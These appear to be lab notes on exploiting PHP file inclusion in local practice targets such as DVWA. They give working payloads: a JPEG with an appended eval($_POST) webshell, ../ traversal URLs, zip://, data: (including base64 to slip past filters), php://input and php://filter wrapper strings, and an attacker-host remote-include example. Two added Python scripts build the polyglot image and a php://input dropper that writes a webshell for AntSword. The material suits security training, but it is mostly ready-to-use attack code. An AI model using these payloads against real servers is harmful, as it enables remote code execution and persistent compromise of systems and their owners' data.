一、File inclusion (local) 🌟🌟
1、In the getimagesize file-upload lab, upload the crafted 111shell2.jpg (a real JPEG with a one-line PHP webshell appended, so getimagesize() still accepts it as an image while include() will later execute the PHP block inside it).
(1) This is the URL of the upload page:
http://192.168.1.32:8083/vul/unsafeupload/getimagesize.php
(2) This is the save path the lab reports for the uploaded image (relative to the upload lab's directory):
uploads/2022/01/25/63414861efd573ba090720236716.jpg
(3) Join the two, i.e. replace getimagesize.php with the reported path:
http://192.168.1.32:8083/vul/unsafeupload/uploads/2022/01/25/63414861efd573ba090720236716.jpg
(4) Request the joined URL; if the image loads, the path is correct.
2、In the inclusion lab, pick any option from the drop-down.
(1) This is the resulting URL (the including script and its filename parameter):
http://192.168.1.32:8083/vul/fileinclude/fi_local.php?filename=file2.php&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2
(2) The script passes filename straight into include.
We cannot see how many directory levels sit between the including script and the uploaded file (each level is one ../: one level is ../, two levels is ../../), so we try each depth in turn and append the path of the webshell image from step 1 after the ../ sequence.
(3) That is, we combine
http://192.168.1.32:8083/vul/fileinclude/fi_local.php?filename=file2.php&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2
and
http://192.168.1.32:8083/vul/unsafeupload/uploads/2022/01/25/63414861efd573ba090720236716.jpg
trying one level, then two. Two levels work, i.e.:
http://192.168.1.32:8083/vul//fileinclude/fi_local.php?filename=../../unsafeupload/uploads/2022/01/25/63414861efd573ba090720236716.jpg&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2
Why two rather than one: fi_local.php sits in /vul/fileinclude/ and the upload in /vul/unsafeupload/, so a single ../ would suffice if the parameter were included as-is. The local lab evidently prepends a fixed include/ directory to the parameter before include() (compare the remote lab below, whose default parameter is include/file1.php, i.e. the prefix is supplied by the client there), so the path resolves as vul/fileinclude/include/../../unsafeupload/... and the second ../ is needed to climb out of include/.
Verified successfully:
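The procedure above as one offline script, added here as an example and not part of the original notes: it appends a PHP one-liner to a JPEG the way the polyglot 111shell2.jpg was built, then models how include() resolves the filename parameter to find the smallest ../ depth that lands on the upload, instead of guessing the depth by hand. The base URL, upload path and button label are taken from the URLs above; the assumption that fi_local.php prepends include/ to the parameter is inferred from the remote lab's default parameter and should be checked against the lab source; the one-liner payload and the JPEG header bytes are constructed samples (use a real JPEG for the actual upload, since getimagesize() needs valid image headers).

```python
import posixpath
from typing import Optional
from urllib.parse import urlencode

# Values taken from the lab URLs in these notes
BASE = "http://192.168.1.32:8083"
VULN_PAGE = "/vul/fileinclude/fi_local.php"
UPLOAD_PATH = "/vul/unsafeupload/uploads/2022/01/25/63414861efd573ba090720236716.jpg"
SUBMIT_LABEL = "提交查询"  # decoded value of submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2
# Assumption (inferred, verify in fi_local.php): the script does include "include/" . $_GET['filename']
INCLUDE_PREFIX = "include/"
# Constructed sample payload; any <?php ... ?> block works once include() parses the file
PHP_ONELINER = b'<?php @eval($_POST["cmd"]); ?>'


def make_polyglot(image_bytes: bytes, php_payload: bytes) -> bytes:
    """Append PHP to a real JPEG (same effect as `copy /b 111.jpg + shell2.php 111shell2.jpg`).
    getimagesize() only parses the image headers at the front, so the file still
    passes as an image, while include() executes every <?php ... ?> block it finds."""
    if image_bytes[:3] != b"\xff\xd8\xff":
        raise ValueError("not a JPEG: missing SOI marker")
    return image_bytes + b"\n" + php_payload


def looks_like_polyglot(data: bytes) -> bool:
    """Quick local check before uploading: JPEG magic up front and PHP somewhere after it."""
    return data[:3] == b"\xff\xd8\xff" and b"<?php" in data


def traversal_payload(depth: int) -> str:
    """filename= value that climbs `depth` directories, then walks down to the upload."""
    return "../" * depth + UPLOAD_PATH.split("/vul/", 1)[1]  # unsafeupload/uploads/...


def resolved_include_path(vuln_page: str, prefix: str, filename: str) -> str:
    """Offline model of the path include() opens: the including script's directory,
    then the hard-coded prefix, then the user-controlled filename, with ../ collapsed."""
    script_dir = posixpath.dirname(vuln_page)
    return posixpath.normpath(posixpath.join(script_dir, prefix + filename))


def find_depth(max_depth: int = 6) -> Optional[int]:
    """Smallest ../ depth whose resolved path is exactly the uploaded file."""
    for depth in range(1, max_depth + 1):
        if resolved_include_path(VULN_PAGE, INCLUDE_PREFIX, traversal_payload(depth)) == UPLOAD_PATH:
            return depth
    return None


def build_url(depth: int) -> str:
    """Full lab URL for a given depth; urlencode percent-encodes the button label
    exactly as the browser did in the URLs above."""
    query = urlencode({"filename": traversal_payload(depth), "submit": SUBMIT_LABEL}, safe="/")
    return f"{BASE}{VULN_PAGE}?{query}"


if __name__ == "__main__":
    depth = find_depth()
    print("depth:", depth)
    print("payload URL:", build_url(depth))
    # With a real JPEG on disk:
    # open("111shell2.jpg", "wb").write(make_polyglot(open("111.jpg", "rb").read(), PHP_ONELINER))
```

With the include/ prefix in place the model returns depth 2, matching what the manual trial found; if the lab source turns out not to prepend anything, set INCLUDE_PREFIX to an empty string and the same script reports depth 1.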
二、File inclusion (remote)
(1) Remote file inclusion: no upload is needed. Pass the absolute path of the generated 111shell2.jpg directly:
First pick any file from the drop-down.
Take that URL:
http://192.168.1.32:8083/vul/fileinclude/fi_remote.php?filename=include%2Ffile1.php&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2#
and replace the filename value with the local path of 111shell2.jpg:
C:/safe/practice/111shell2.jpg
giving:
http://192.168.1.32:8083/vul/fileinclude/fi_remote.php?filename=C:/safe/practice/111shell2.jpg&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2#
(2) Verify with HackBar:
Success.
Note that although the lab is labelled "remote", this payload is an absolute local path: the script passes filename to include without any prefix, so any file readable by the web server can be named. A genuinely remote include (filename=http://attacker-host/shell.txt) additionally needs allow_url_include=On together with allow_url_fopen=On in php.ini.
//Extension:
(1) Try including the webshell uploaded through the DVWA file-upload lab into this lab:
The lab URL:
http://192.168.1.32:8083/vul/fileinclude/fi_remote.php?filename=include%2Ffile1.php&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2#
The error message at DVWA's medium level reveals the full path of the successfully uploaded file:
C:/phpstudy_pro/WWW/dvwa/hackable/uploads/111shell2.jpg
Combined:
http://192.168.1.32:8083/vul/fileinclude/fi_remote.php?filename=C:/phpstudy_pro/WWW/dvwa/hackable/uploads/111shell2.jpg&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2#
Verify:
Success.
(2) Try the file:// wrapper:
The lab URL:
http://192.168.1.32:8083/vul/fileinclude/fi_remote.php?filename=include%2Ffile1.php&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2#
and the file:// form of the 111shell2.jpg path:
file:///phpstudy_pro/WWW/dvwa/hackable/uploads/111shell2.jpg
Combined:
http://192.168.1.32:8083/vul/fileinclude/fi_remote.php?filename=file:///phpstudy_pro/WWW/dvwa/hackable/uploads/111shell2.jpg&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2#
Verify:
Success. (The path carries no drive letter, so on Windows it is resolved against the process's current drive, C: here; the explicit form is file:///C:/phpstudy_pro/WWW/dvwa/hackable/uploads/111shell2.jpg.)
(3) Try other wrappers:
1) zip:// wrapper:
Pack shell2.php into a zip archive.
Access shell2.php through the zip:// wrapper:
zip://C:/safe/practice/shell2.zip%23shell2.php
Combined with the lab URL:
http://192.168.1.32:8083/vul/fileinclude/fi_remote.php?filename=zip://C:/safe/practice/shell2.zip%shell2.php&submit=1
Verify:
Error; the reason is probably that my VM has no zip by default, only 7z. (Two things to check before blaming the archiver: the combined URL above has a bare % where %23 should be, so the # that separates the archive from the entry name never reaches PHP; and the zip:// wrapper is provided by PHP's zip extension, which must be enabled in php.ini. Which tool created the archive does not matter to PHP.)
2) data: wrapper (requires allow_url_include=On):
Format: data:text/plain,<?php phpinfo(); ?>
Combined:
http://192.168.1.32:8083/vul/fileinclude/fi_remote.php?filename=data:text/plain,<?php phpinfo(); ?>&submit=1
Verified successfully:
🌟data: variant: base64-encode the data content (keeps <, ?, ; and spaces out of the URL and gets past naive filters that look for <?php):
data:text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==
Combined:
http://192.168.1.32:8083/vul/fileinclude/fi_remote.php?filename=data:text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==&submit=1
Verify:
3) php:// wrapper (php://input, also requires allow_url_include=On):
http://192.168.1.32:8083/vul/fileinclude/fi_remote.php?filename=php://input&submit=1
Then POST the PHP code as the raw request body and it is executed.
AntSword cannot be pointed at this directly, because the code has to travel as the raw POST body rather than in a file; instead, put a PHP statement in the POST data that writes a one-line webshell to disk, then connect AntSword to that file.
4) Wrapper for reading a page's source (the output is base64-encoded and has to be decoded; this one works even with allow_url_include off):
http://192.168.1.32:8083/vul/fileinclude/fi_remote.php?filename=php://filter/read=convert.base64-encode/resource=fi_remote.php&submit=1
5) Common wrappers:
6)
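The wrapper payloads from 1) to 4) built programmatically, added here as an example and not part of the original notes: it produces the data: (plain and base64) and php://filter strings used above, builds the zip archive and the zip:// payload with the # encoded as %23 (the combined URL in 1) lost the 23), generates the php://input POST body that drops a standalone one-liner for AntSword, and decodes the base64 blob a php://filter read returns. Paths, entry names and the phpinfo() probe are taken from the notes; the HTML around the base64 blob passed to decode_filter_output is a constructed stand-in for the lab page. Two caveats worth keeping in mind: data: and php://input only work with allow_url_include=On, whereas php://filter and zip:// do not need it; and zip:// comes from PHP's zip extension, which must be enabled.

```python
import base64
import io
import re
import zipfile
from urllib.parse import quote

PHPINFO = "<?php phpinfo(); ?>"  # probe used in the notes


def data_wrapper(php: str, use_base64: bool = False) -> str:
    """data: wrapper payload (needs allow_url_include=On). The base64 form keeps
    <, ?, ; and spaces out of the URL and defeats naive filters on '<?php'."""
    if use_base64:
        return "data:text/plain;base64," + base64.b64encode(php.encode()).decode()
    return "data:text/plain," + php


def build_zip_shell(entry: str, php: str) -> bytes:
    """Archive the zip:// wrapper will open. Kept in memory here; write it with
    open('shell2.zip', 'wb').write(...) to reproduce C:/safe/practice/shell2.zip."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(entry, php)
    return buf.getvalue()


def zip_entry(archive: bytes, entry: str) -> bytes:
    """Read one entry back out, to check the archive before it leaves the box."""
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        return zf.read(entry)


def zip_wrapper(archive_path: str, entry: str) -> str:
    """zip://<archive>#<entry>. The '#' must be sent as %23: a bare '#' is a URL
    fragment, so the browser strips it and PHP never sees the entry name."""
    return "zip://" + archive_path + quote("#", safe="") + entry


def php_single_quoted(s: str) -> str:
    """Escape for a PHP single-quoted literal (only backslash and ' are special there)."""
    return "'" + s.replace("\\", "\\\\").replace("'", "\\'") + "'"


def input_dropper(shell_filename: str, shell_code: str) -> str:
    """POST body for filename=php://input (needs allow_url_include=On). Rather than
    running commands through the raw body, it writes a standalone webshell so a
    client such as AntSword can then be pointed at shell_filename."""
    return "<?php file_put_contents(%s, %s); ?>" % (
        php_single_quoted(shell_filename), php_single_quoted(shell_code))


def filter_wrapper(resource: str) -> str:
    """Read a script's source as base64 instead of executing it."""
    return "php://filter/read=convert.base64-encode/resource=" + resource


def decode_filter_output(page_body: str) -> str:
    """Pull the longest base64 run out of the returned HTML and decode it."""
    runs = re.findall(r"[A-Za-z0-9+/]{16,}={0,2}", page_body)
    if not runs:
        raise ValueError("no base64 blob in response")
    return base64.b64decode(max(runs, key=len)).decode("utf-8", errors="replace")


if __name__ == "__main__":
    print(data_wrapper(PHPINFO))
    print(data_wrapper(PHPINFO, use_base64=True))
    print(zip_wrapper("C:/safe/practice/shell2.zip", "shell2.php"))
    print(input_dropper("shell.php", '<?php @eval($_POST["cmd"]); ?>'))
    print(filter_wrapper("fi_remote.php"))
```

Each string goes into the filename parameter of fi_remote.php exactly as printed (the data: payloads are passed unencoded here, as in the notes; HackBar or a proxy sends them verbatim, a browser address bar may re-encode them). The php://input body from input_dropper is sent as the raw POST body, and the page returned for the php://filter payload is fed to decode_filter_output.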